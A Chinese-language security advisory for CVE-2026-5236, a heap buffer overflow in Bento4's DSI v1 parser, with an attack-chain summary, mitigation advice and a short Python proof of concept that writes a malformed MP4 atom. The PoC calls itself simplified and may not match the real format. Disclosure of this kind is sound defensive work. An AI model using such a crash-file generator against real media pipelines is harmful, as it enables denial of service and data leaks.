CVE-2026-5236 CVSS 5.3 中危

CVE-2026-5236 Bento4堆缓冲区溢出漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5236

漏洞类型

堆缓冲区溢出

CVSS评分

5.3 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Axiomatic Bento4

漏洞概述

Axiomatic Bento4 版本 1.6.0-641 及之前版本中存在一处堆缓冲区溢出漏洞。该漏洞位于 DSI v1 Parser 组件的 Ap4Dac4Atom.cpp 文件中的 AP4_BitReader::SkipBits 函数内。攻击者可以通过恶意构造 n_presentations 参数来触发此漏洞。由于需要本地访问权限和低权限用户级别，该漏洞被评定为中危。目前公开的利用代码已可用，且官方尚未发布修复补丁。

技术细节

该漏洞的根本原因在于 Ap4Dac4Atom.cpp 文件中 AP4_BitReader::SkipBits 函数在处理位流数据时，未能对输入参数 n_presentations 进行严格的边界检查。当解析特制的 DSI v1 格式媒体文件时，畸形的 n_presentations 数值会导致 SkipBits 操作读取超出分配堆缓冲区的数据范围，从而引发堆缓冲区溢出。攻击者利用此漏洞可能导致敏感信息泄露（C:L）、数据完整性受损（I:L）或服务可用性中断（A:L）。由于攻击向量为本地（AV:L），攻击者必须能够执行本地代码或诱导用户解析恶意文件，这限制了攻击范围，但在多用户系统或特定沙箱逃逸场景下仍具有风险。

攻击链分析

STEP 1

1. 获取访问权限

攻击者需要在目标系统上拥有本地低权限账户（PR:L）。

STEP 2

2. 构造恶意文件

攻击者利用 PoC 代码创建包含畸形的 n_presentations 参数的特制媒体文件（如 MP4）。

STEP 3

3. 触发解析

诱导受害者或自动处理系统使用易受攻击的 Bento4 版本解析该恶意文件。

STEP 4

4. 执行溢出

AP4_BitReader::SkipBits 函数处理畸形参数，导致堆缓冲区溢出，可能造成信息泄露或拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC Concept for CVE-2026-5236
# This script demonstrates how to craft a malformed DSI v1 atom
# to trigger the heap overflow in AP4_BitReader::SkipBits.

import struct

def create_malformed_dsi_atom():
    # Atom header (type 'dsi ')
    atom_header = b'\x00\x00\x00\x20dsi '
    
    # Vulnerable argument: n_presentations
    # Setting an excessively large value to cause SkipBits overflow
    # Normal values are small integers, large values bypass checks
    n_presentations = 0xFFFFFFFF 
    
    # Pack the data (simplified representation)
    payload = struct.pack('<I', n_presentations)
    
    # Fill remaining buffer to fit size 0x20
    payload += b'A' * (0x20 - len(atom_header) - len(payload))
    
    return atom_header + payload

if __name__ == "__main__":
    malformed_data = create_malformed_dsi_atom()
    with open("crash.mp4", "wb") as f:
        f.write(malformed_data)
    print("[+] Malformed file generated: crash.mp4")
    print("[+] Use Bento4 (<= 1.6.0-641) to parse this file to trigger the crash.")

影响范围

Axiomatic Bento4 <= 1.6.0-641

防御指南

临时缓解措施

由于官方尚未发布修复补丁，建议暂时停止使用受影响版本的 Bento4 解析来源不明的媒体文件。可以通过设置严格的文件权限和输入过滤来减少攻击面，并在最小权限环境下运行相关应用程序。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5236
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5236
3 Details https://www.cvedetails.com/cve/CVE-2026-5236/
4 VulDB https://vuldb.com/cve/CVE-2026-5236
5 Link https://github.com/axiomatic-systems/Bento4/issues/1059
6 Link https://github.com/axiomatic-systems/Bento4/issues/1059#issue-4078584738
7 Link https://vuldb.com/submit/780473
8 Link https://vuldb.com/vuln/354387
9 Link https://vuldb.com/vuln/354387/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表